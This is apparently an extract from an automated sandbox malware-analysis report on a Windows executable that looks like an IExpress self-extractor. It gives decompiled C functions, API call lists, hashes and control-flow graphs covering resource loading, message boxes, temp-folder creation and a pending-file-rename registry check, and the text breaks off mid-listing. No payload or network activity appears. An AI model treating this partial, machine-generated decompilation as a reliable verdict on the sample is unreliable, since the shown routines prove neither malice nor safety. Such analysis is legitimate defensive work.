                                                                                                                                                                                                                                                0x00055685
                                                                                                                                                                                                                                                0x0005568c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005568c
                                                                                                                                                                                                                                                0x0005567a
                                                                                                                                                                                                                                                0x0005560e
                                                                                                                                                                                                                                                0x00055613
                                                                                                                                                                                                                                                0x0005561a
                                                                                                                                                                                                                                                0x00055620
                                                                                                                                                                                                                                                0x00055626
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055626
                                                                                                                                                                                                                                                0x000555db
                                                                                                                                                                                                                                                0x000555e0
                                                                                                                                                                                                                                                0x000555e7
                                                                                                                                                                                                                                                0x000555f1
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000555f6
                                                                                                                                                                                                                                                0x000558b7
                                                                                                                                                                                                                                                0x000558c7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546A0
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: SizeofResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546A9
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000546C3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LoadResource.KERNEL32(00000000,00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: LockResource.KERNEL32(00000000,?,00052D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000546D3
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: memcpy_s.MSVCRT ref: 000546E5
                                                                                                                                                                                                                                                  • Part of subcall function 0005468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000546EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 000555CF
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00055638
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0005564C
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00055620
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                  • Part of subcall function 000544B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                  • Part of subcall function 00056285: GetLastError.KERNEL32(00055BBC), ref: 00056285
                                                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 000556B9
                                                                                                                                                                                                                                                • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0005571E
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00055737
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 000557CD
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 000557EF
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00055802
                                                                                                                                                                                                                                                  • Part of subcall function 00052630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00052654
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00055830
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FindResourceA.KERNEL32(00050000,000007D6,00000005), ref: 0005652A
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: LoadResource.KERNEL32(00050000,00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00056538
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: DialogBoxIndirectParamA.USER32(00050000,00000000,00000547,000519E0,00000000), ref: 00056557
                                                                                                                                                                                                                                                  • Part of subcall function 00056517: FreeResource.KERNEL32(00000000,?,?,00052EE8,00000000,000519E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00056560
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00055878
                                                                                                                                                                                                                                                  • Part of subcall function 0005597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 000559A8
                                                                                                                                                                                                                                                  • Part of subcall function 0005597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 000559AF
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                                                                                                                                                • API String ID: 2436801531-3855382519
                                                                                                                                                                                                                                                • Opcode ID: 25257565fa74d6dc6bbf4089f6f14d6e6ad6ae928b6bb080c25bb62e94ca0ce6
                                                                                                                                                                                                                                                • Instruction ID: 06c50c70b337472d09f6c0e9ea1713a2511bc2d5bfb6260c745c2a0b6be6d029
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25257565fa74d6dc6bbf4089f6f14d6e6ad6ae928b6bb080c25bb62e94ca0ce6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB813970A04A089BEB609B709C65BFF76AD9F65303F040165FD86E3191EF748DCD8A51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000544B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 544b9-544f8 407 544fe-54525 LoadStringA 406->407 408 54679-5467b 406->408 409 54527-5452e call 5681f 407->409 410 54562-54568 407->410 411 5467c-5468c call 56ce0 408->411 418 54530-5453d call 567c9 409->418 419 5453f 409->419 414 5456b-54570 410->414 414->414 417 54572-5457c 414->417 420 5457e-54580 417->420 421 545c9-545cb 417->421 418->419 425 54544-54554 MessageBoxA 418->425 419->425 426 54583-54588 420->426 423 54607-54617 LocalAlloc 421->423 424 545cd-545cf 421->424 429 5455a-5455d 423->429 430 5461d-54628 call 51680 423->430 428 545d2-545d7 424->428 425->429 426->426 431 5458a-5458c 426->431 428->428 433 545d9-545ed LocalAlloc 428->433 429->411 437 5462d-5463d MessageBeep call 5681f 430->437 432 5458f-54594 431->432 432->432 435 54596-545ad LocalAlloc 432->435 433->429 436 545f3-54605 call 5171e 433->436 435->429 439 545af-545c7 call 5171e 435->439 436->437 444 5463f-5464c call 567c9 437->444 445 5464e 437->445 439->437 444->445 448 54653-54677 MessageBoxA LocalFree 444->448 445->448 448->411
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E000544B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x58004; // 0x5a679bd9
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x58a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x59a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00051680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0005171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0005171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0005681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E000567C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0005681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E000567C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00056CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                                0x000544b9
                                                                                                                                                                                                                                                0x000544c4
                                                                                                                                                                                                                                                0x000544cb
                                                                                                                                                                                                                                                0x000544d8
                                                                                                                                                                                                                                                0x000544e4
                                                                                                                                                                                                                                                0x000544eb
                                                                                                                                                                                                                                                0x000544ee
                                                                                                                                                                                                                                                0x000544ef
                                                                                                                                                                                                                                                0x000544ef
                                                                                                                                                                                                                                                0x000544f1
                                                                                                                                                                                                                                                0x000544f7
                                                                                                                                                                                                                                                0x000544f8
                                                                                                                                                                                                                                                0x0005467b
                                                                                                                                                                                                                                                0x000544fe
                                                                                                                                                                                                                                                0x00054509
                                                                                                                                                                                                                                                0x00054518
                                                                                                                                                                                                                                                0x00054525
                                                                                                                                                                                                                                                0x00054562
                                                                                                                                                                                                                                                0x00054568
                                                                                                                                                                                                                                                0x00054568
                                                                                                                                                                                                                                                0x0005456b
                                                                                                                                                                                                                                                0x0005456b
                                                                                                                                                                                                                                                0x0005456d
                                                                                                                                                                                                                                                0x0005456e
                                                                                                                                                                                                                                                0x00054572
                                                                                                                                                                                                                                                0x00054578
                                                                                                                                                                                                                                                0x0005457c
                                                                                                                                                                                                                                                0x000545cb
                                                                                                                                                                                                                                                0x00054607
                                                                                                                                                                                                                                                0x00054607
                                                                                                                                                                                                                                                0x0005460d
                                                                                                                                                                                                                                                0x00054613
                                                                                                                                                                                                                                                0x00054617
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005461d
                                                                                                                                                                                                                                                0x00054623
                                                                                                                                                                                                                                                0x00054626
                                                                                                                                                                                                                                                0x00054628
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054628
                                                                                                                                                                                                                                                0x000545cd
                                                                                                                                                                                                                                                0x000545cd
                                                                                                                                                                                                                                                0x000545cf
                                                                                                                                                                                                                                                0x000545cf
                                                                                                                                                                                                                                                0x000545d2
                                                                                                                                                                                                                                                0x000545d2
                                                                                                                                                                                                                                                0x000545d4
                                                                                                                                                                                                                                                0x000545d5
                                                                                                                                                                                                                                                0x000545db
                                                                                                                                                                                                                                                0x000545de
                                                                                                                                                                                                                                                0x000545e3
                                                                                                                                                                                                                                                0x000545e9
                                                                                                                                                                                                                                                0x000545ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000545f3
                                                                                                                                                                                                                                                0x000545fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00054602
                                                                                                                                                                                                                                                0x000545ed
                                                                                                                                                                                                                                                0x0005457e
                                                                                                                                                                                                                                                0x0005457e
                                                                                                                                                                                                                                                0x00054580
                                                                                                                                                                                                                                                0x00054580
                                                                                                                                                                                                                                                0x00054583
                                                                                                                                                                                                                                                0x00054583
                                                                                                                                                                                                                                                0x00054585
                                                                                                                                                                                                                                                0x00054586
                                                                                                                                                                                                                                                0x0005458a
                                                                                                                                                                                                                                                0x0005458c
                                                                                                                                                                                                                                                0x0005458f
                                                                                                                                                                                                                                                0x0005458f
                                                                                                                                                                                                                                                0x00054591
                                                                                                                                                                                                                                                0x00054592
                                                                                                                                                                                                                                                0x0005459b
                                                                                                                                                                                                                                                0x0005459e
                                                                                                                                                                                                                                                0x000545a3
                                                                                                                                                                                                                                                0x000545a9
                                                                                                                                                                                                                                                0x000545ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x000545af
                                                                                                                                                                                                                                                0x000545af
                                                                                                                                                                                                                                                0x000545bf
                                                                                                                                                                                                                                                0x0005462d
                                                                                                                                                                                                                                                0x00054630
                                                                                                                                                                                                                                                0x0005463d
                                                                                                                                                                                                                                                0x0005464e
                                                                                                                                                                                                                                                0x0005464e
                                                                                                                                                                                                                                                0x0005463f
                                                                                                                                                                                                                                                0x00054640
                                                                                                                                                                                                                                                0x00054647
                                                                                                                                                                                                                                                0x0005464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005464c
                                                                                                                                                                                                                                                0x00054666
                                                                                                                                                                                                                                                0x0005466d
                                                                                                                                                                                                                                                0x0005466f
                                                                                                                                                                                                                                                0x00054675
                                                                                                                                                                                                                                                0x00054675
                                                                                                                                                                                                                                                0x000545ad
                                                                                                                                                                                                                                                0x00054527
                                                                                                                                                                                                                                                0x0005452e
                                                                                                                                                                                                                                                0x0005453f
                                                                                                                                                                                                                                                0x0005453f
                                                                                                                                                                                                                                                0x00054530
                                                                                                                                                                                                                                                0x00054531
                                                                                                                                                                                                                                                0x00054538
                                                                                                                                                                                                                                                0x0005453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005453d
                                                                                                                                                                                                                                                0x00054554
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x0005455a
                                                                                                                                                                                                                                                0x00054525
                                                                                                                                                                                                                                                0x0005468c

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00054518
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,?,lenta,00010010), ref: 00054554
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000545A3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000065), ref: 000545E3
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000002), ref: 0005460D
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 00054630
                                                                                                                                                                                                                                                • MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00054666
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000), ref: 0005466F
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0005686E
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: GetSystemMetrics.USER32(0000004A), ref: 000568A7
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 000568CC
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegQueryValueExA.ADVAPI32(?,00051140,00000000,?,?,0000000C), ref: 000568F4
                                                                                                                                                                                                                                                  • Part of subcall function 0005681F: RegCloseKey.ADVAPI32(?), ref: 00056902
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
                                                                                                                                                                                                                                                • String ID: LoadString() Error. Could not load string resource.$lenta
                                                                                                                                                                                                                                                • API String ID: 3244514340-1000497449
                                                                                                                                                                                                                                                • Opcode ID: f999e552ddf2171d3925a31fde3c8404f4ea8cf97177ae183017d9e24107d546
                                                                                                                                                                                                                                                • Instruction ID: e42001235c316e0b1b110c043a534ecb83ff7376802d51a4a49709def819c363
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f999e552ddf2171d3925a31fde3c8404f4ea8cf97177ae183017d9e24107d546
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC51E771900619ABDB219F28CC48BEB7BB9EF46306F144194FD09A7242DB35DD8DCB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 000553A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000553A1(CHAR* __ecx, CHAR* __edx) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t5;
				long _t13;
				int _t14;
				CHAR* _t20;
				int _t29;
				int _t30;
				CHAR* _t32;
				signed int _t33;
				void* _t34;

				_t5 =  *0x58004; // 0x5a679bd9
				_v8 = _t5 ^ _t33;
				_t32 = __edx;
				_t20 = __ecx;
				_t29 = 0;
				while(1) {
					E0005171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
					_t34 = _t34 + 0x10;
					_t29 = _t29 + 1;
					E00051680(_t32, 0x104, _t20);
					E0005658A(_t32, 0x104,  &_v268); // executed
					RemoveDirectoryA(_t32); // executed
					_t13 = GetFileAttributesA(_t32); // executed
					if(_t13 == 0xffffffff) {
						break;
					}
					if(_t29 < 0x190) {
						continue;
					}
					L3:
					_t30 = 0;
					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
						_t30 = 1;
						DeleteFileA(_t32);
						CreateDirectoryA(_t32, 0);
					}
					L5:
					return E00056CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
				}
				_t14 = CreateDirectoryA(_t32, 0); // executed
				if(_t14 == 0) {
					goto L3;
				}
				_t30 = 1;
				 *0x58a20 = 1;
				goto L5;
			}

















                                                                                                                                                                                                                                                0x000553ac
                                                                                                                                                                                                                                                0x000553b3
                                                                                                                                                                                                                                                0x000553b9
                                                                                                                                                                                                                                                0x000553bb
                                                                                                                                                                                                                                                0x000553bd
                                                                                                                                                                                                                                                0x000553bf
                                                                                                                                                                                                                                                0x000553d1
                                                                                                                                                                                                                                                0x000553d6
                                                                                                                                                                                                                                                0x000553e0
                                                                                                                                                                                                                                                0x000553e2
                                                                                                                                                                                                                                                0x000553f5
                                                                                                                                                                                                                                                0x000553fb
                                                                                                                                                                                                                                                0x00055402
                                                                                                                                                                                                                                                0x0005540b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055413
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00055415
                                                                                                                                                                                                                                                0x00055416
                                                                                                                                                                                                                                                0x00055427
                                                                                                                                                                                                                                                0x0005542a
                                                                                                                                                                                                                                                0x0005542b
                                                                                                                                                                                                                                                0x00055434
                                                                                                                                                                                                                                                0x00055434
                                                                                                                                                                                                                                                0x0005543a
                                                                                                                                                                                                                                                0x0005544c
                                                                                                                                                                                                                                                0x0005544c
                                                                                                                                                                                                                                                0x00055452
                                                                                                                                                                                                                                                0x0005545a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005545e
                                                                                                                                                                                                                                                0x0005545f
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0005171E: _vsnprintf.MSVCRT ref: 00051750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 000553FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005541F
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0005542B
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055434
                                                                                                                                                                                                                                                • CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00055452
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000000.00000002.394017135.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394008394.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394029552.0000000000058000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000000.00000002.394038626.000000000005C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_50000_file.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$IXP$IXP%03d.TMP
                                                                                                                                                                                                                                                • API String ID: 1082909758-3862032828
                                                                                                                                                                                                                                                • Opcode ID: 5ade734f13ccbb8eddfa2634286c2678c1b2e1826990d0d75e3180b2b5f907bf
                                                                                                                                                                                                                                                • Instruction ID: 5f1ebec936b0e85392f46c8554fc9708afd0438c1110acfb4efcfe733c7368ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5ade734f13ccbb8eddfa2634286c2678c1b2e1826990d0d75e3180b2b5f907bf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1211047130060477E7209B269C49FEF366DEBC6323F001125BA46D31D1CE788E8A86A2
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 0005256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 563 5256d-5257d 564 52583-52589 563->564 565 52622-52627 call 524e0 563->565 567 525e8-52607 RegOpenKeyExA 564->567 568 5258b 564->568 573 52629-5262f 565->573 569 525e3-525e6 567->569 570 52609-52620 RegQueryInfoKeyA 567->570 572 52591-52595 568->572 568->573 569->573 575 525d1-525dd RegCloseKey 570->575 572->573 574 5259b-525ba RegOpenKeyExA 572->574 574->569 576 525bc-525cb RegQueryValueExA 574->576 575->569 576->575
                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E0005256D(signed int __ecx) {
				int _v8;
				void* _v12;
				signed int _t13;
				signed int _t19;
				long _t24;
				void* _t26;
				int _t31;
				void* _t34;

				_push(__ecx);
				_push(__ecx);
				_t13 = __ecx & 0x0000ffff;
				_t31 = 0;
				if(_t13 == 0) {
					_t31 = E000524E0(_t26);
				} else {
					_t34 = _t13 - 1;
					if(_t34 == 0) {
						_v8 = 0;
						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
							goto L7;
						} else {
							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
							goto L6;
						}
						L12:
					} else {
						if(_t34 > 0 && __ecx <= 3) {
							_v8 = 0;
							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
							if(_t24 == 0) {
								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
								L6:
								asm("sbb eax, eax");
								_v8 = _v8 &  !( ~_t19);
								RegCloseKey(_v12); // executed
							}
							L7:
							_t31 = _v8;
						}
					}
				}
				return _t31;
				goto L12;
			}











                                                                                                                                                                                                                                                0x00052572
                                                                                                                                                                                                                                                0x00052573
                                                                                                                                                                                                                                                0x00052575
                                                                                                                                                                                                                                                0x00052578
                                                                                                                                                                                                                                                0x0005257d
                                                                                                                                                                                                                                                0x00052627
                                                                                                                                                                                                                                                0x00052583
                                                                                                                                                                                                                                                0x00052586
                                                                                                                                                                                                                                                0x00052589
                                                                                                                                                                                                                                                0x000525eb
                                                                                                                                                                                                                                                0x00052607
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00052609
                                                                                                                                                                                                                                                0x0005261a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0005261a
                                                                                                                                                                                                                                                0x00000000
